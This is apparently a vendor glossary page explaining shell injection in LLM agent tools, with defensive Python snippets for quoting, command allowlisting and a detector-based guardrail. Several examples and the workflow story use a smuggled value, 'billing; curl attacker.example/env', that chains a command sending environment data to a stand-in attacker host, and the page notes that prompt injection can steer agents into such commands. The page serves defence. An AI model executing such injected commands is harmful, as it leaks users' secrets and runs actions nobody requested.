Security

What Is Shell Injection (LLM)?

An LLM security failure where untrusted model, user, or tool content changes an operating-system command before execution.

Shell injection in an LLM system is a security failure where model, user, or tool output is placed into an operating-system command without strict validation, letting an attacker change what the shell executes. It is a core LLM security risk in agent tools, code-generation workflows, terminal copilots, and production traces. FutureAGI surfaces it through eval:CommandInjectionDetector, so teams can score generated commands, block unsafe actions at the post-guardrail stage, and regression-test fixes before a command reaches infrastructure.

Why Shell Injection Matters in Production LLM and Agent Systems

Shell injection turns text generation into command execution. The dangerous pattern is usually simple: an agent builds a command string from user input, retrieved text, model output, or a tool result, then sends it to a shell. If the string contains ;, &&, |, backticks, $() command substitution, or file redirection in the wrong place, the attacker can append a second operation. The resulting failure modes are remote command execution and destructive command chaining.
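The data-versus-syntax distinction can be seen in a small sketch. The service name below is purely illustrative, and `shlex.quote` is one standard-library way to keep an untrusted value a single shell token; it is a mitigation example, not FutureAGI functionality:

```python
import shlex

# Illustrative untrusted slot, e.g. a ticket field or model output.
service_name = "billing; curl attacker.example/env"

# Unsafe: naive interpolation lets ';' start a second command in a shell.
unsafe = f"grep {service_name} /var/log/app.log"

# Safer: shlex.quote turns the whole value into one shell token,
# so the ';' stays data instead of becoming syntax.
safe = f"grep {shlex.quote(service_name)} /var/log/app.log"

print(unsafe)  # grep billing; curl attacker.example/env /var/log/app.log
print(safe)    # grep 'billing; curl attacker.example/env' /var/log/app.log
```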

Developers feel the pain when a coding agent works in tests but emits unsafe shell fragments in edge cases. SREs see odd terminal-tool failures, unexpected outbound traffic, missing files, increased job retries, or token-heavy traces where the agent keeps repairing a broken command. Security teams need to prove whether a risky command was generated, blocked, executed, or copied into a human-run script. End users may only see the blast radius: deleted artifacts, leaked environment variables, or a support workflow that ran a command outside the request.

The risk is higher in 2026 multi-step agent stacks because the model no longer only writes prose. Agents run CI helpers, operate notebooks, call MCP tools, write deployment scripts, and pass terminal output into later steps. A prompt-injection message or poisoned README can become shell syntax three tool calls later, especially when the agent has a broad terminal.run tool and no command boundary check.
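A command boundary check of the kind the paragraph above alludes to can be very small. This is a hypothetical sketch (the allowlist, regex, and function name are illustrative, not part of any FutureAGI or MCP API): allow only known binaries and reject any shell metacharacter before the terminal tool runs:

```python
import re

# Common shell metacharacters that can chain or substitute commands.
SHELL_METACHARS = re.compile(r"[;&|`$<>]")

def passes_boundary(command: str,
                    allowed=("grep", "tail", "cat", "ls")) -> bool:
    """Allow only allowlisted binaries with no shell metacharacters."""
    parts = command.split()
    if not parts or parts[0] not in allowed:
        return False
    return SHELL_METACHARS.search(command) is None

print(passes_boundary("grep billing /var/log/app.log"))            # True
print(passes_boundary("grep billing; curl attacker.example/env"))  # False
```

A check this strict will also reject legitimate pipelines, which is the point: anything needing |, $(), or redirection should go through a typed tool interface rather than a raw shell string.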

How FutureAGI Handles Shell Injection

FutureAGI anchors shell-injection review to the eval:CommandInjectionDetector surface. The inventory class is CommandInjectionDetector, a security detector for OS command injection vulnerabilities. In practice, engineers run it on generated scripts, terminal-tool arguments, notebook cells, CI commands, and agent traces that include proposed shell execution.

A realistic workflow starts with a code-repair agent instrumented through traceAI-langchain. A user asks it to inspect logs for a service name. The model proposes grep ${service_name} /var/log/app.log | tail -50, but the service name came from a ticket field containing billing; curl attacker.example/env. The trace records the user message, prompt version, route, agent.trajectory.step, tool.name, and the proposed command in tool.arguments.command. Before the terminal tool executes, Agent Command Center applies a post-guardrail that calls CommandInjectionDetector. A flagged command is blocked, the fallback asks for a sanitized service identifier, and the trace is added to a regression dataset.
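The block-and-fallback step of that workflow can be sketched as follows. StubDetector stands in for CommandInjectionDetector and mirrors its evaluate(output=...) call shape, but everything else here (names, threshold, return dict) is hypothetical wiring, not FutureAGI or Agent Command Center API:

```python
from dataclasses import dataclass

@dataclass
class Finding:
    score: float
    reason: str

class StubDetector:
    """Stand-in detector: flags common shell metacharacters as high-risk."""
    def evaluate(self, output: str) -> Finding:
        risky = any(ch in output for ch in ";&|`$")
        return Finding(1.0 if risky else 0.0,
                       "shell metacharacter in command" if risky else "clean")

def guarded_run(command: str, detector, run_fn, threshold: float = 0.5):
    """Score the proposed command before the terminal tool executes it."""
    finding = detector.evaluate(output=command)
    if finding.score >= threshold:
        # Block and surface the reason so the agent can fall back to
        # asking for a sanitized service identifier.
        return {"executed": False, "reason": finding.reason}
    return {"executed": True, "output": run_fn(command)}

decision = guarded_run(
    "grep billing; curl attacker.example/env /var/log/app.log",
    StubDetector(),
    run_fn=lambda cmd: "log lines...",
)
print(decision)  # {'executed': False, 'reason': 'shell metacharacter in command'}
```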

FutureAGI’s approach is to score the command at the action boundary. Unlike a Semgrep scan that only sees committed code, FutureAGI can inspect model-generated commands, tool arguments, and production traces before a side effect happens. The engineer can then set a zero-tolerance release gate for high-risk shell execution, alert on detector failures by route, and replay confirmed attacks against new prompts, models, and tool policies.

How to Measure or Detect Shell Injection

Measure shell injection where commands are created and where they execute:

  • CommandInjectionDetector - detects OS command injection risk in generated code or command strings, including unsafe shell composition.
  • Trace fields - inspect agent.trajectory.step, tool.name, tool.arguments.command, route, prompt version, guardrail decision, and fallback reason.
  • Dashboard signals - track command-injection-fail-rate, post-guardrail-block-rate, terminal-tool-call rate, and confirmed-bypass count by tenant.
  • Runtime symptoms - watch for shell metacharacters in user-controlled slots, unexpected network calls, missing files, or commands that combine unrelated operations.
  • Feedback proxy - monitor escalation tickets where the agent ran a command the user did not request or produced an unsafe script for copy-paste.

A minimal scoring call with the detector looks like this:

from fi.evals import CommandInjectionDetector

# Unsafe composition: user_query is concatenated into a shell=True call.
code = 'subprocess.run("grep " + user_query, shell=True)'

detector = CommandInjectionDetector()
result = detector.evaluate(output=code)
print(result.score, result.reason)  # risk score plus the detector's rationale

Use thresholding by route. A sandboxed tutorial agent may warn and ask for confirmation, while a production deployment agent should block any high-confidence shell-injection finding before execution.
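Route-based thresholding can be expressed as a small policy table. The route names, field names, and decide helper below are all illustrative, not a FutureAGI configuration format:

```python
# Hypothetical per-route policy: what happens when a shell-injection
# finding comes back, and how confident the detector must be to act.
ROUTE_POLICY = {
    "tutorial-sandbox": {"on_flag": "warn_and_confirm", "threshold": 0.8},
    "prod-deploy": {"on_flag": "block", "threshold": 0.0},
}

def decide(route: str, score: float) -> str:
    """Fail closed: unknown routes get the strictest policy."""
    policy = ROUTE_POLICY.get(route, ROUTE_POLICY["prod-deploy"])
    return policy["on_flag"] if score > policy["threshold"] else "allow"

print(decide("prod-deploy", 0.2))       # block
print(decide("tutorial-sandbox", 0.2))  # allow
```

Failing closed on unknown routes matters: a new agent route added without an explicit policy should inherit the production block behavior, not the sandbox warning.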

Common Mistakes

  • Building shell commands with string concatenation. Prefer argument arrays, allowlisted subcommands, and typed parameters instead of raw shell strings.
  • Checking only user input. Model output, retrieved files, issue titles, tool responses, and memory can all supply hostile command fragments.
  • Guarding before planning only. A prompt can look safe while the final tool.arguments.command is unsafe. Check the proposed action too.
  • Ignoring copy-paste scripts. A generated command shown to a developer can still execute in production if pasted into a terminal.
  • Treating escaping as the whole fix. Escaping helps, but privileged tools also need authorization, sandboxing, audit logs, and regression evals.
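The first mistake above has a direct remedy in Python's standard library: pass an argument array and skip the shell entirely. A minimal sketch (assumes a POSIX system where echo is on PATH):

```python
import subprocess

# Untrusted value that would chain a second command under shell=True.
user_query = "billing; echo INJECTED"

# With an argument array and no shell, the whole value is a single argv
# entry: the ';' reaches echo as data and is never parsed as syntax.
out = subprocess.run(["echo", user_query], capture_output=True, text=True)
print(out.stdout.strip())  # billing; echo INJECTED
```

The injected echo never runs; the payload is printed back literally because it stayed one argument.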

Frequently Asked Questions

What is shell injection in LLM systems?

Shell injection is an LLM security failure where untrusted user, model, or tool content is inserted into an operating-system command and changes what the shell executes.

How is shell injection different from prompt injection?

Prompt injection changes model instructions. Shell injection changes an operating-system command, often after a prompt-injection attack has steered an agent toward an unsafe tool call.

How do you measure shell injection?

Use FutureAGI's CommandInjectionDetector on generated command strings and review Agent Command Center post-guardrail blocks by route, tool, tenant, and trace ID.